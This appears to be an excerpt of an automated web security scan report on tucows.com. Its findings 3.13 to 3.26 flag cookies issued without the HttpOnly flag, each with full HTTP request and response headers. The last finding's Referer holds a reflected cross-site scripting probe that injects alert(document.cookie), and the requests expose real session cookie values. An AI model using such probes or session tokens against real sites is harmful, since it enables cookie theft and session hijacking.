3.13. http://www.tucows.com/images/newassets/includes/js/signupin.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/signupin.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (it is the cookie named in the Set-Cookie header of the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/includes/js/signupin.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

3.14. http://www.tucows.com/images/newassets/includes/js/x_core.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/x_core.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (it is the cookie named in the Set-Cookie header of the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/includes/js/x_core.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:30 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

3.15. http://www.tucows.com/images/newassets/includes/js/xdocsize.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/xdocsize.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (it is the cookie named in the Set-Cookie header of the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/includes/js/xdocsize.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

3.16. http://www.tucows.com/images/newassets/includes/js/yetii.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/yetii.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (it is the cookie named in the Set-Cookie header of the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/includes/js/yetii.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

3.17. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/style.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (it is the cookie named in the Set-Cookie header of the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/includes/themes/03BlueMeany/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

3.18. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/styles.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (it is the cookie named in the Set-Cookie header of the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/includes/themes/03BlueMeany/styles.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

3.19. http://www.tucows.com/images/newassets/javascript:void(null)

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/javascript:void(null)

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (it is the cookie named in the Set-Cookie header of the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/javascript:void(null) HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

3.20. http://www.tucows.com/images/newassets/lostpass.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/lostpass.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (it is the cookie named in the Set-Cookie header of the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/lostpass.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

3.21. http://www.tucows.com/images/newassets/privacy.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/privacy.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (it is the cookie named in the Set-Cookie header of the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

3.22. http://www.tucows.com/images/newassets/safesearchtoggle.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/safesearchtoggle.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/safesearchtoggle.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

3.23. http://www.tucows.com/images/newassets/search.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/search.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/search.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

3.24. http://www.tucows.com/images/newassets/sitemap.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/sitemap.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/sitemap.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

3.25. http://www.tucows.com/images/newassets/terms.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/terms.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/terms.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

3.26. http://www.tucows.com/images/newassets/warningcow200.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/warningcow200.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/warningcow200.png HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
